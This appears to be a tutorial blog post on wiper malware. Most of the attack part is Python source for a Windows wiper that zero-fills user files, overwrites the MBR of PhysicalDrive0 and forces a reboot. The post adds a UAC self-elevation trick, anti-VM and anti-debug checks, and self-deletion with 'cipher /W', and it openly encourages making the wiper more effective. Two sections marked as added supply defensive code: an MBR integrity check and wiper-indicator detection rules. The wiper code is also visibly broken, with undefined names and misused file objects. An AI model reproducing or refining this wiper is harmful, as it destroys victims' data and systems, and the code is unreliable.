Wipers

A wiper is a class of malware intended to erase (wipe, hence the name) the hard drive of the computer it infects, maliciously deleting data and programs.

Simply put, a wiper just straight up removes EVERYTHING on a system, thus "disabling" the system. I found this awesome article by @0xf00I that I'll be using as my main reference for this. Such malware typically works in four stages:

  1. Destroy file contents

  2. Destroy MBR

  3. Remove self

  4. Shut it down!

Let's look at a simple Python wiper. Assuming that you got a rootkit to pack with this sucker, here's a simple program to wipe all things off of a Windows system:

import os 
import subprocess
import ctypes
from ctypes import wintypes
import win32api


startupinfo = subprocess.STARTUPINFO() #type: ignore 
drives = win32api.GetLogicalDriveStrings()
kernel32 = ctypes.WinDLL('kernel32')


def OverWriteMBR(): 
    hDevice = Kernel32.CreateFileW("\\\\.\\PhysicalDrive0", 0x40000000, 0x00000001 | 0x00000002, None, 3, 0,0) # Create a handle to our Physical Drive
    Kernel32.WriteFile(hDevice, Data, None) # Overwrite the MBR! (Never run this on your main machine!)
    Kernel32.CloseHandle(hDevice) # Close the handle to our Physical Drive!
    
def SetFiles():
    ext = [
           ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
           ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
           ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", 
           ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h", 
           ".gif", ".txt", ".jar", ".sql", ".bundle",
           ".sqlite3", ".html", ".php", ".log", ".bak", ".deb"] # files to seek out and overwrite
    for dirpath, dirs, files in os.walk(f"C:\\Users\\{os.getlogin()}\\{os.getcwd()}"): 
        for f in files:
            path = os.path.abspath(os.path.join(dirpath, f))
            if f.endswith(tuple(ext)): 
                with open(f, "rb") as files:
                    data = files.read()
                    files.close()
                    with open(f, "wb") as files:
                        data.write(b'\x00') # Overwrites multiple files with zero bytes (hex 00)
                        data.close()                             


def SysDown():
    # InitiateSystemShutdown()  
    os.system("shutdown -t 0 -r -f ") 

def main():
        global application_path 
        if getattr(sys, 'frozen', False):
            application_path = sys.executable
        else:
            application_path = os.path.dirname(os.path.abspath(__file__))

            SetFiles()
            OverWriteMBR()
if __name__ == "__main__":
    main()
    SysDown()

Simple as that! Run this as admin and it'll remove everything including the MBR. Neat right? Well, it's not very effective, but you can add a whole bunch of stuff to make it even better! (I'll once again be yoinking some code from the exalted @0xf00I's skywiper repo...)
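Stage 2 above targets the first sector of the disk, so the defender's counterpart is a boot-sector integrity check. What follows is an added example for this page, not code from the original post or from the skywiper repo. It parses a 512-byte MBR (a constructed sample sector, not one read from a real disk), verifies the 0x55AA boot signature and the partition table, and compares a SHA-256 of the sector against a recorded baseline, which is how a forensic triage script would tell an intact sector from a zero-filled one.

```python
import hashlib
import struct

SECTOR_SIZE = 512
PART_TABLE_OFFSET = 446       # four 16-byte partition entries live at 446..509
BOOT_SIG_OFFSET = 510
BOOT_SIGNATURE = 0xAA55       # stored little-endian, i.e. bytes 55 AA on disk


def parse_mbr(sector):
    """Parse the boot signature and the four primary partition entries of one MBR sector."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly %d bytes" % SECTOR_SIZE)
    signature = struct.unpack_from("<H", sector, BOOT_SIG_OFFSET)[0]
    partitions = []
    for i in range(4):
        offset = PART_TABLE_OFFSET + 16 * i
        # entry layout: status(1) CHS start(3) type(1) CHS end(3) LBA start(4) sector count(4)
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", sector, offset)
        if ptype != 0:  # type 0 marks an unused entry
            partitions.append({"bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": sectors})
    return {
        "signature_ok": signature == BOOT_SIGNATURE,
        "partitions": partitions,
        "sha256": hashlib.sha256(sector).hexdigest(),
    }


def assess_mbr(sector, baseline_sha256=None):
    """Return a list of findings; an empty list means the sector looks intact."""
    info = parse_mbr(sector)
    findings = []
    if sector == bytes(SECTOR_SIZE):
        findings.append("sector is all zeros (consistent with an overwrite)")
    if not info["signature_ok"]:
        findings.append("boot signature 0x55AA missing")
    if not info["partitions"]:
        findings.append("partition table empty")
    if baseline_sha256 and info["sha256"] != baseline_sha256:
        findings.append("sector hash differs from recorded baseline")
    return findings


def build_sample_mbr():
    """Constructed sample sector (not taken from any real disk): fake bootstrap code,
    one bootable NTFS-type partition starting at LBA 2048, and a valid boot signature."""
    sector = bytearray(SECTOR_SIZE)
    sector[0:3] = b"\xEB\x3C\x90"  # a short jump, as real boot code begins with
    sector[3:PART_TABLE_OFFSET] = bytes((i * 7) % 256 for i in range(PART_TABLE_OFFSET - 3))
    struct.pack_into("<B3xB3xII", sector, PART_TABLE_OFFSET, 0x80, 0x07, 2048, 1_000_000)
    struct.pack_into("<H", sector, BOOT_SIG_OFFSET, BOOT_SIGNATURE)
    return bytes(sector)


if __name__ == "__main__":
    good = build_sample_mbr()
    baseline = parse_mbr(good)["sha256"]   # record this while the machine is known-good
    print("intact sector:", assess_mbr(good, baseline) or "no findings")
    wiped = bytes(SECTOR_SIZE)             # what a zero-fill of sector 0 leaves behind
    for finding in assess_mbr(wiped, baseline):
        print("wiped sector:", finding)
```

In practice the baseline hash is recorded once while the host is known-good and stored off the host, because a wiper that reaches sector 0 has already had write access to everything else on the disk; the check is then run from boot media or against a disk image during incident response.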

For example, you can add a checking mechanism that checks if the program is being run with elevated privileges:

def IsAdmin():
    """ it checks if it has Administrator privileges, if it doesn't it runs itself using the ShellExecute trick and exits immediately
        if it does, it performs the task at hand. """
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

Maybe some function to run the thing as admin:

def RunAsAdmin():
    ctypes.windll.shell32.IsUserAnAdmin() or (ctypes.windll.shell32.ShellExecuteW(
        None, "runas", sys.executable, " ".join(sys.argv), None, 1) > 32, sys.exit())

Some anti-debug/anti-VM magic never hurts:

def AntiVm():
      Process = ["vmsrvc.exe" , "vmusrvc.exe", "vboxtray.exe", "vmtoolsd.exe", "df5serv.exe", "vboxservice.exe"]
      for process in psutil.process_iter():
         for i in Process:
            if i in process.name().lower():
                return CommitSuicide()

def AntiDebug():
    isDebuggerPresent = windll.kernel32.IsDebuggerPresent()
    if (isDebuggerPresent):
        return CommitSuicide() 
        
def CommitSuicide():
    file_path = os.path.abspath(__file__) 
    os.remove(file_path)
    folder_path = os.path.dirname(file_path) 
    os.system("cipher /W:%s" % folder_path) # At the end of the script, the file is deleted & over-written

You can include calls to all this stuff in the main() function and you'll have an even better wiper! Alas, good wipers are far too complicated, and it's best if I leave it here. I'll try to write one and put it up here in the future (no guarantees though!). Please feel free to reach out and ask about this stuff if you need to~
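Seen from the detection side, the pieces above leave a recognisable trail: a process opening a raw handle to \\.\PhysicalDrive0, a child "cipher /W:" run against the folder the binary lived in, and a forced "shutdown -t 0 -r -f". The following is an added example, not code from the original post or from the skywiper repo; it runs those three indicators over constructed process telemetry in a simplified "time|event|image|pid|detail" layout (not real Sysmon or EDR output) and rolls child helpers up to the process that launched them, so one launcher that shows all three stages stands out while a routine delayed shutdown does not.

```python
import re
from collections import defaultdict

# Indicators drawn from the stages described on this page. The patterns are applied
# to the detail field (command line or accessed device) only.
RULES = [
    ("raw handle to physical drive",
     re.compile(r"\\\\\.\\PhysicalDrive\d+", re.I)),
    ("free-space wipe via cipher /W",
     re.compile(r"\bcipher(\.exe)?\b.*\s/W:", re.I)),
    ("forced immediate reboot",
     re.compile(r"\bshutdown(\.exe)?\b(?=.*\s[-/]f\b)(?=.*\s[-/]t\s+0\b)", re.I)),
]

PARENT_RE = re.compile(r"\bparent=(\d+)")

# Constructed sample telemetry (not captured from a real host). Process 4120 performs
# all three stages; process 5000 is a benign shutdown scheduled ten minutes out.
SAMPLE_LOG = """\
2024-01-01T10:00:01|ProcessCreate|C:\\Windows\\explorer.exe|1200|explorer.exe
2024-01-01T10:00:05|ProcessCreate|C:\\Users\\alice\\Downloads\\update.exe|4120|update.exe
2024-01-01T10:00:06|RawDeviceAccess|C:\\Users\\alice\\Downloads\\update.exe|4120|\\\\.\\PhysicalDrive0 access=GENERIC_WRITE
2024-01-01T10:00:07|ProcessCreate|C:\\Windows\\System32\\cipher.exe|4130|cipher /W:C:\\Users\\alice\\Downloads parent=4120
2024-01-01T10:00:08|ProcessCreate|C:\\Windows\\System32\\shutdown.exe|4140|shutdown -t 0 -r -f parent=4120
2024-01-01T10:05:00|ProcessCreate|C:\\Windows\\System32\\shutdown.exe|5000|shutdown /s /t 600 parent=1200
"""


def parse_line(line):
    """Split one telemetry line into its five fields; return None for malformed lines."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    time, event, image, pid, detail = parts
    return {"time": time, "event": event, "image": image, "pid": pid, "detail": detail}


def scan(log_text):
    """Return one hit per matching (line, rule). A hit is attributed to the parent pid
    when the detail names one, so helper children roll up to their launcher."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parent = PARENT_RE.search(rec["detail"])
        owner = parent.group(1) if parent else rec["pid"]
        for name, pattern in RULES:
            if pattern.search(rec["detail"]):
                hits.append({"time": rec["time"], "pid": rec["pid"],
                             "attributed_pid": owner, "indicator": name})
    return hits


def suspects(log_text, min_indicators=2):
    """Map pid -> sorted indicator names for processes showing at least
    min_indicators distinct wiper indicators."""
    seen = defaultdict(set)
    for hit in scan(log_text):
        seen[hit["attributed_pid"]].add(hit["indicator"])
    return {pid: sorted(names) for pid, names in seen.items()
            if len(names) >= min_indicators}


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("%s pid=%s (owner %s): %s" % (hit["time"], hit["pid"],
                                             hit["attributed_pid"], hit["indicator"]))
    print("suspects:", suspects(SAMPLE_LOG))
```

The combination matters more than any single rule: administrators run shutdown and cipher legitimately, but a single launcher that opens the physical drive for writing, wipes free space in its own directory and then forces a reboot within seconds is the sequence this page describes, and the raw-disk write alone is worth an alert on its own because almost nothing outside disk-imaging tools needs it.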
